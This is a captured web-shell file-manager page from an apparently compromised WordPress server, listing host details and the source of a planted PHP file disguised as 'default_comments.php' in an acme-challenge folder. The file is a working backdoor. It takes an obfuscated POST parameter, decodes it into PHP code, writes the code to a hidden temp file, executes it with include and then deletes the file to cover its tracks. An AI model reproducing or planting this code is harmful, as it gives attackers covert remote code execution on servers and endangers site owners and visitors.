HEX
Server: nginx/1.28.0
System: Linux yisu-68a5f20334161 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User: www (1000)
PHP: 8.2.28
Disabled: passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
Upload Files
File: /www/wwwroot/q.autos58.cn/wp-content/well-known/acme-challenge/e/a/b/g/default_comments.php
<?php

if(filter_has_var(INPUT_POST, "ent\x72\x79")){
	$key = array_filter(["/dev/shm", sys_get_temp_dir(), "/tmp", getcwd(), getenv("TMP"), getenv("TEMP"), session_save_path(), ini_get("upload_tmp_dir"), "/var/tmp"]);
	$pset = $_POST["ent\x72\x79"];
	   $pset = explode (   '.' 	,	 	$pset	) ;  	
	$reference	 = '';
            $salt	 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	 = strlen($salt);
    
            foreach($pset as $r => $v6) { $chS	 = ord($salt[$r 	%  $sLen]);
                $d	 = ((int)$v6 - $chS -($r 	%  10))^	 16;
                $reference .= chr($d);
            }
	$flag = 0;
do {
    $pgrp = $key[$flag] ?? null;
    if ($flag >= count($key)) break;
    		if ((function($d) { return is_dir($d) && is_writable($d); })($pgrp)) {
    $ent = sprintf("%s/.pointer", $pgrp);
    if (@file_put_contents($ent, $reference) !== false) {
	include $ent;
	unlink($ent);
	exit;
}
}
    $flag++;
} while (true);
}